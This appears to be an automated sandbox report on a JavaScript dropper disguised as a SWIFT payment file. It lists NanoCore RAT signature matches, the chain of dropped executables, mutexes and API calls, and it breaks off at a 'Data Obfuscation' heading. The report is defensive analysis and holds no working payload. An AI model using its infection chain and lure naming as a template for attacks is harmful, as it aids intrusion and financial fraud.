      Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5316 -s 624
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeCode function: 1_2_00406D5F1_2_00406D5F
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_0040CCEA2_2_0040CCEA
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_0040DA1A2_2_0040DA1A
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_0040D23B2_2_0040D23B
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_0040EEC02_2_0040EEC0
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_0040C7992_2_0040C799
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_00480F9C2_2_00480F9C
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_004812542_2_00481254
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_0040CBD13_2_0040CBD1
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_022CE4713_2_022CE471
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_022CE4803_2_022CE480
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_022CBBD43_2_022CBBD4
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_0507F5F83_2_0507F5F8
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_050797883_2_05079788
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_0507A5D03_2_0507A5D0
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_0507A6103_2_0507A610
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: String function: 00401EE0 appears 33 times
      Source: SWIFT MO104978172_1301 EURO 9700.jsInitial sample: Strings found which are bigger than 50
      Source: SWIFT MO104978172_1301 EURO 9700.jsReversingLabs: Detection: 46%
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT MO104978172_1301 EURO 9700.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe "C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe"
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeProcess created: C:\Users\user\AppData\Local\Temp\fdqkbs.exe "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess created: C:\Users\user\AppData\Local\Temp\fdqkbs.exe C:\Users\user\AppData\Local\Temp\fdqkbs.exe
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess created: C:\Users\user\AppData\Local\Temp\fdqkbs.exe "C:\Users\user\AppData\Local\Temp\fdqkbs.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe "C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe" "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppD
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5316 -s 624
      Source: C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 656
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe "C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe" "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppD
      Source: C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 628
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe "C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe" Jump to behavior
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeProcess created: C:\Users\user\AppData\Local\Temp\fdqkbs.exe "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.vJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeProcess created: C:\Users\user\AppData\Local\Temp\fdqkbs.exe C:\Users\user\AppData\Local\Temp\fdqkbs.exeJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeJump to behavior
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeFile created: C:\Users\user\AppData\Local\Temp\nse2F02.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winJS@13/22@0/1
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeCode function: 1_2_004021AA CoCreateInstance,1_2_004021AA
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeCode function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404AB5
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1808
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{82fe3011-00e2-4a52-9361-cad1a21dd84e}
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5316
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4612
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 3_2_0040147B GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,3_2_0040147B
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCommand line argument: GetTickCount2_2_00402571
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCommand line argument: Kernel32.dll2_2_00402571
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCommand line argument: Kernel32.dll2_2_00402571
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCommand line argument: Sleep2_2_00402571
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCommand line argument: Kernel32.dll2_2_00402571
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCommand line argument: VirtualAlloc2_2_00402571
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCommand line argument: Kernel32.dll2_2_00402571
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCommand line argument: Notepad2_2_00402571
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCommand line argument: Notepad2_2_00402571
      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCommand line argument: Notepad2_2_00402571
      Source: 3.2.fdqkbs.exe.4910000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 3.2.fdqkbs.exe.4910000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 3.2.fdqkbs.exe.4910000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Binary string: C:\xampp\htdocs\ab320849c3d04f77b5cc7477929d7dcb\Loader\Release\Loader.pdb source: SWIFT MO104978172_1301 EURO 9700.exe, 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmp, SWIFT MO104978172_1301 EURO 9700.exe, 00000001.00000002.275512291.000000000283E000.00000004.00000020.00020000.00000000.sdmp, fdqkbs.exe, 00000002.00000002.270678669.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, fdqkbs.exe, 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmp, fdqkbs.exe, 00000002.00000000.257316994.0000000000410000.00000002.00000001.01000000.00000007.sdmp, fdqkbs.exe, 00000003.00000000.260606717.0000000000410000.00000002.00000001.01000000.00000007.sdmp, fdqkbs.exe, 00000008.00000000.278941376.0000000000410000.00000002.00000001.01000000.00000007.sdmp, fdqkbs.exe, 00000008.00000002.297962991.0000000000410000.00000002.00000001.01000000.00000007.sdmp, syhbwgs.exe, 0000000B.00000002.298205955.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, syhbwgs.exe, 0000000B.00000000.286300116.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, syhbwgs.exe, 00000015.00000002.314785679.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, syhbwgs.exe, 00000015.00000000.308154727.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, fdqkbs.exe.1.dr, nse2F03.tmp.1.dr, syhbwgs.exe.2.dr
      Source: Binary string: wntdll.pdbUGP source: fdqkbs.exe, 00000002.00000003.265726648.000000001A460000.00000004.00001000.00020000.00000000.sdmp, fdqkbs.exe, 00000002.00000003.262758217.000000001A5F0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: fdqkbs.exe, 00000002.00000003.265726648.000000001A460000.00000004.00001000.00020000.00000000.sdmp, fdqkbs.exe, 00000002.00000003.262758217.000000001A5F0000.00000004.00001000.00020000.00000000.sdmp

      Data Obfuscation

      barindex
